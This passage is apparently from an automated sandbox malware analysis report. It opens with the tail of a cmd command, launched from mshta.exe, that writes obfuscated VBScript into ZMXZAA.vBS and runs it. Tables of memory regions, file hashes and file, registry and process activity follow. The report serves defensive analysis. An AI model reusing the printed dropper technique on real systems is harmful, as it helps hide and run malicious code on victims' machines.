>>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:17, Reason: Child Process |
| Unmonitor | End Time: 00:01:20, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x488 |
| Parent PID | 0xbf0 (c:\windows\syswow64\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
56C
0x
884
0x
8DC
0x
7DC
0x
490
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x000f0000 | 0x000f0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00230000 | 0x00296fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00320000 | 0x00323fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x00330000 | 0x0034ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00360000 | 0x0038ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00490000 | 0x00493fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x004a0000 | 0x00505fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x006f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c90000 | 0x01c90000 | 0x01fd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fe0000 | 0x01fe0000 | 0x020dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x020e0000 | 0x023aefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x024effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000024f0000 | 0x024f0000 | 0x025cefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002610000 | 0x02610000 | 0x0264ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002650000 | 0x02650000 | 0x0268ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026d0000 | 0x026d0000 | 0x027cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027d0000 | 0x027d0000 | 0x028cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000028d0000 | 0x028d0000 | 0x02cc2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d30000 | 0x02d30000 | 0x02d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002dc0000 | 0x02dc0000 | 0x02ebffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x49de0000 | 0x49e2bfff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x735d0000 | 0x735d6fff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x74b00000 | 0x74b2dfff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74b30000 | 0x74b7bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74b80000 | 0x74ba0fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74bb0000 | 0x74d4dfff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74fa0000 | 0x75094fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| ZMXZAA.vBS | 0.36 KB |
MD5:
76394c78dab3b7089a1a6acf42509477
SHA1: a7aed8a35617a56163111586542ef4a87a587848 SHA256: 702e6db9f623fcbc869fe3c021a299a8e588b614f6cc08a1159fb582f3e2a81c SSDeep: 6:xX74FxUrFl4tVPMqDXXTKSBaa9OcLSNmBfWmm28fKZXTKYowvREv:ROxUzcVPhDXXTKl2st2OKZXTKYpG |
|
|
| ZMXZAA.vBS | 1.26 KB |
MD5:
c6aa04b128215694004c407c3b852d54
SHA1: 812aa9d9e25b4224bed17a9d1dba924848431b16 SHA256: 48063dd13918789ab03b2c0c29846758ce26041bd433374572159824857f4e4d SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEcHxYVbHzHAr12YHQVv:Q62sA2FIDzD1vcYVq12jv |
|
|
| ZMXZAA.vBS | 0.27 KB |
MD5:
d359dc00c70089446d2ebb1dcc0a22b1
SHA1: dbfd9c034106f35897940e581e747dfda846916a SHA256: 6eba7c22b47a55a1574954d890b613889735d675bdc480e760531fce486b2dbb SSDeep: 6:xX74FxUrFl4tVPMqDXXTKSBaa9OcLSNmBfWmm28fKv:ROxUzcVPhDXXTKl2st2OKv |
|
|
| ZMXZAA.vBS | 0.57 KB |
MD5:
e100bcc9ae8acc8ac7ea6013ae717cac
SHA1: f88c13ab76e590b545cbb8fbbf92b4419e501a22 SHA256: 4ca43859aa0649dc7051d7c2cd452eac05a2f1bd6b44fa7d8972540071535b7c SSDeep: 12:ROxUzcVPhDXXTKl2st2OKZXTKYpZ2FmyvDzkSqDHlXTGT:YUIPhbGl2svsGiZ2FX87DFG |
|
|
| ZMXZAA.vBS | 0.17 KB |
MD5:
8aea4cf8fce66ad27e2bf0d2f744aad4
SHA1: 548a30e9622054f5471000ef020800d7cb01128a SHA256: 3234c0e84badf66f1fbd96664a36295e7e03304533ab778a463993f1f8b6b796 SSDeep: 3:xXIG431xUSYFGQ4tbp7PHsgvDNG9M/AmQyThF3U3FoBqhc1P97Kc062c:xX74FxUrFl4tVPMqDXXTKSBaa9OcZ |
|
|
| ZMXZAA.vBS | 1.29 KB |
MD5:
08a1381b14b414376c3008834f906367
SHA1: e23f8f26afb54a1af3708d7e948266b7dff3b519 SHA256: c5de9065b15fa9c7e941e091b0a3bce9791e0715f97baebdd21d1499382723b8 SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEcHxYVbHzHAr12YHQVbwv:Q62sA2FIDzD1vcYVq12jsv |
|
|
| ZMXZAA.vBS | 1.20 KB |
MD5:
7ebd382b19ae3b173851738478dd2e8b
SHA1: 467e4f0afbe4e307f50468e2ab82bf1babe958d5 SHA256: b4508772fe84ed55164161c054351dc5ddaf10b8f7bcbfec669e7ba01963d977 SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEcHxYVbHzHAr12d:Q62sA2FIDzD1vcYVq12d |
|
|
| ZMXZAA.vBS | 0.41 KB |
MD5:
0a1355967297a9b1d7821159ad373fae
SHA1: 4b1a7582a0baf8fcc95712ee3cfe9daeed5ea257 SHA256: 3207d2c174dd1cd125950dd9c2cf356e60894f081ad47a3ff99d1699727f465d SSDeep: 6:xX74FxUrFl4tVPMqDXXTKSBaa9OcLSNmBfWmm28fKZXTKYowvREsZa9Ocs:ROxUzcVPhDXXTKl2st2OKZXTKYpZ2W |
|
|
| ZMXZAA.vBS | 1.36 KB |
MD5:
61bf2a09a8120fb06ef3874df959497f
SHA1: e032110ba5a5355bb2adc830f5620a01fd0da932 SHA256: 202c9d3d134cc97d46a1c690ec646318c5fd4bd3b652c392b4a4318456e75d42 SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEcHxYVbHzHAr12YHQVbwu1Uj1:Q62sA2FIDzD1vcYVq12jsu1A |
|
|
| ZMXZAA.vBS | 0.76 KB |
MD5:
088c89815fc43b30e6a70e82b15edeeb
SHA1: fff1806e7a33c14250a5d8f703a1d5247cd78827 SHA256: 1f3685780266050bc5fbad006bfd8be7825ad688a16c9395f0f0c0fab275264a SSDeep: 12:ROxUzcVPhDXXTKl2st2OKZXTKYpZ2FmyvDzkSqDHlXTGLqD1Heqm+2OL/:YUIPhbGl2svsGiZ2FX87DFRD1+qFz |
|
|
| ZMXZAA.vBS | 0.12 KB |
MD5:
7fda17f5ca7715de8d38bd99fa7736d5
SHA1: 8bb1f4460bb7637a707de2c2b07f6720d3079a20 SHA256: d086ad36031aab15e965d05ec441bd3ac430514616a59d72ee9eaba13b29d78a SSDeep: 3:xXIG431xUSYFGQ4tbp7PHsgvDNG9M/AmQyThF3U3Fov:xX74FxUrFl4tVPMqDXXTKSv |
|
|
| ZMXZAA.vBS | 0.20 KB |
MD5:
10f0f164a78beccb8db88eda0b53f3e5
SHA1: 22dad3e911aeb917ca84eb63c3242fff8a2ebb3a SHA256: b06ce9b25104cb1ada964f3cc01fe4d72aa9ac2a67e2f924f31e433fe672c00f SSDeep: 6:xX74FxUrFl4tVPMqDXXTKSBaa9OcLSNmH:ROxUzcVPhDXXTKl2sK |
|
|
| ZMXZAA.vBS | 1.44 KB |
MD5:
616a1983bbbd57970336396f2d7938af
SHA1: 1f8d5b187701306cbf3470274663629a5632c87d SHA256: dd79dfb42fa530a5011006bd12fc39675c55cb313686d52f3510c99b22c29932 SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEcHxYVbHzHAr12YHQVbwu1Uj+X2nq:Q62sA2FIDzD1vcYVq12jsu1x2nq |
|
|
| ZMXZAA.vBS | 0.67 KB |
MD5:
4eee0fee7716aafbc1201f5dcae15f57
SHA1: 414b117cf96367bb55e0abede497b8de99f13b62 SHA256: 5135a264107a738658dd6c0b6f55d4581e2a389b2240f6c325c02e78abf2ac17 SSDeep: 12:ROxUzcVPhDXXTKl2st2OKZXTKYpZ2FmyvDzkSqDHlXTGLqD1HeqmP:YUIPhbGl2svsGiZ2FX87DFRD1+qO |
|
|
| ZMXZAA.vBS | 0.48 KB |
MD5:
067db5e18c4bc2beceef1554eb330975
SHA1: cc5c9c248be052f8c699ffeae5832ed9f470a8b8 SHA256: bdf2a28f5a4ac76ba9a0ea5799ff35a8b8a54a395cc8e03b3d97c17fe4655cbd SSDeep: 12:ROxUzcVPhDXXTKl2st2OKZXTKYpZ2FmyvDzkc:YUIPhbGl2svsGiZ2FX8c |
|
|
| ZMXZAA.vBS | 0.61 KB |
MD5:
28d18a08466be2b04439f73ac7388933
SHA1: 410d5f4897fb0fe5911f795232d28d422f491a5a SHA256: be4a38241ae74e47f5ef8b9bf968b9b4dd91bfcbe6c1daaf99382f8cc4cdd335 SSDeep: 12:ROxUzcVPhDXXTKl2st2OKZXTKYpZ2FmyvDzkSqDHlXTGLqD1HB:YUIPhbGl2svsGiZ2FX87DFRD1h |
|
|
| ZMXZAA.vBS | 0.07 KB |
MD5:
86a21e1b2fb2fa9027e096692e00a2b5
SHA1: 9533be8c668877537745306f05b0481ec3ac891e SHA256: fc5ccf089389a1251f850ae13f22ee5ce78c817c3dabb2316a55914fd672f968 SSDeep: 3:xXIG431xUSYFGQ4tbp7PHsgvn:xX74FxUrFl4tVPMqn |
|
|
| ZMXZAA.vBS | 1.28 KB |
MD5:
0bdfc64a77b09c6bbad8b132d42a5b12
SHA1: bf26ee760bee15fdd20930fa4d49ca30a43c2bd6 SHA256: 792789eb2ab08df0be9957bbfbec09fd90e0359908a108a03b84779b4c05f5c4 SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEcHxYVbHzHAr12YHQVbL:Q62sA2FIDzD1vcYVq12j3 |
|
|
| ZMXZAA.vBS | 1.08 KB |
MD5:
3be099b60cbf4c697ff410d5e903c561
SHA1: 8c95490ff2e21882a681838e4801817b0c5790a1 SHA256: 005de8ccc8a1cb9add6d56c2c4d620188d07b86718c263ec887a8c5e06605864 SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEcHxYVbHU:Q62sA2FIDzD1vcYVw |
|
|
| ZMXZAA.vBS | 1.01 KB |
MD5:
b90551e7a84ce1fa7a167f8a03024f89
SHA1: 48b2b55f50cd0dc96b6c9cdc6aeb09c4d9d86420 SHA256: dcef9807e2fe4be9389f7b9027443fef64cee75956d5be9997f966318f3c4773 SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEcHxYVc:Q62sA2FIDzD1vcYVc |
|
|
| ZMXZAA.vBS | 1.34 KB |
MD5:
00e03a1dbf26e573fef42d57db496eba
SHA1: 9745fe8fafc9ffa0d868101b4d7d7ce40519f98e SHA256: 91293d796f5b68135c7c4549f29c481c26af7de3f003ecbb878e0cb82d70de95 SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEcHxYVbHzHAr12YHQVbwu1UL:Q62sA2FIDzD1vcYVq12jsu1m |
|
|
| ZMXZAA.vBS | 0.83 KB |
MD5:
ed7893e20dfcc2a30123555da21c0051
SHA1: f0b391a8ace8514c2ed9033f29f347e9ec0e0c1a SHA256: 558e26ccb9f52abc3f2f479b97090c9567733b2ba806192a1ad24ada8b247e75 SSDeep: 12:ROxUzcVPhDXXTKl2st2OKZXTKYpZ2FmyvDzkSqDHlXTGLqD1Heqm+2OLO12Oct:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHE |
|
|
| ZMXZAA.vBS | 0.90 KB |
MD5:
aa0f5dcdc1424111970aed667a1bf9af
SHA1: 0b05a450c38c4e170cb70a70772ff4aa2f64dd96 SHA256: 248b516edaa5d1a7492b81d113e0833b21b939d6889eafd4de26a9564a38504f SSDeep: 24:YUIPhbGl2svsGiZ2FX87DFRD1+qFaHjHEJ:Q62sA2FIDzD1vV |
|
|
Host Behavior
File (333)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | ZMXZAA.vBS | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | ZMXZAA.vBS | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
21 | |
| Create | ZMXZAA.VBs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
23 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
45 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
98 | |
| Open | STD_INPUT_HANDLE | - |
|
4 | |
| Open | STD_OUTPUT_HANDLE | - |
|
68 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | STD_OUTPUT_HANDLE | size = 1, size_out = 1 |
|
22 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 53 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 96 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 99 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 111 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 77 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 115 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 70 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 19 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 10 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 45 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | os_pid = 0x0, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | show_window = SW_SHOWNORMAL |
|
1 |
Module (10)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | SHELL32.dll | base_address = 0x76b00000 |
|
1 | |
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x49de0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76220000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7624a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76253b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76234a5d |
